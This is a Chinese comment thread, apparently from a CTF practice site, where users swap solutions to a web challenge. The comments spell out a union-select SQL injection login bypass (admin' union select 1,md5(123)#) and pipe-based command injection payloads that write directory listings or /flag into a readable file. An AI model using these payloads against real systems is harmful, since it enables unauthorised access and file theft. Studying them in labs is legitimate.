直接扫描就能扫出来
离谱 最后的思路 我输入| 就被过滤,这怎么玩? 最后就是在新的页面打开 网站114.67.175.224:15054/test 就完成了注入
注入:我用sqlmap跑不出,绕不过过滤的东西。上手,绕过union select即可。 命令注入:无回显,输出到文件在访问即可。
看不懂提示
https://blog.csdn.net/weixin_58111246/article/details/123482301?spm=1001.2014.3001.5501
以下正解:抓包后返回里面有个提示代码,base64解码后得到数据库代码,页面中username填个admin' union select 1,md5(123)# 然后password填个123,进入到后台,输入框输入12|ls 没反应,输入12|ls ../../../../../>tes,查看test后发现flag文件是在根目录的。12|cat ../../../../flag>te
sql注入,sqlmap,union select绕过密码hash判断、利用管道符|命令执行
???http://114.67.175.224:12328/test直接出来了
访问不到成功被坑6金币,日内瓦!退金币!
用户名:admin' union select 1,md5(123)# 密码:123 成功登陆, 在新页面输入框内输入 123 | cat /flag ../../../../>test (注意:此处的 > 是个大于号,由于编码保护,所以打不出来) , 然后网址栏处输入: url (当前的网址,但要把index.php去掉) /test 得到flag。
...
评论
Hobin 1年前
举报
直接扫描就能扫出来
九筒张麻子 1年前
举报
离谱 最后的思路 我输入| 就被过滤,这怎么玩? 最后就是在新的页面打开 网站114.67.175.224:15054/test 就完成了注入
lysandria 1年前
举报
注入:我用sqlmap跑不出,绕不过过滤的东西。上手,绕过union select即可。 命令注入:无回显,输出到文件在访问即可。
你能刑 1年前
举报
看不懂提示
200200 2年前
举报
https://blog.csdn.net/weixin_58111246/article/details/123482301?spm=1001.2014.3001.5501
最爱吃兽奶 2年前
举报
以下正解:抓包后返回里面有个提示代码,base64解码后得到数据库代码,页面中username填个admin' union select 1,md5(123)# 然后password填个123,进入到后台,输入框输入12|ls 没反应,输入12|ls ../../../../../>tes,查看test后发现flag文件是在根目录的。12|cat ../../../../flag>te
sixiaokai 2年前
举报
sql注入,sqlmap,union select绕过密码hash判断、利用管道符|命令执行
Cassaundra 2年前
举报
???http://114.67.175.224:12328/test直接出来了
Cassaundra 2年前
举报
访问不到成功被坑6金币,日内瓦!退金币!
holmes 2年前
举报
用户名:admin' union select 1,md5(123)# 密码:123 成功登陆, 在新页面输入框内输入 123 | cat /flag ../../../../>test (注意:此处的 > 是个大于号,由于编码保护,所以打不出来) , 然后网址栏处输入: url (当前的网址,但要把index.php去掉) /test 得到flag。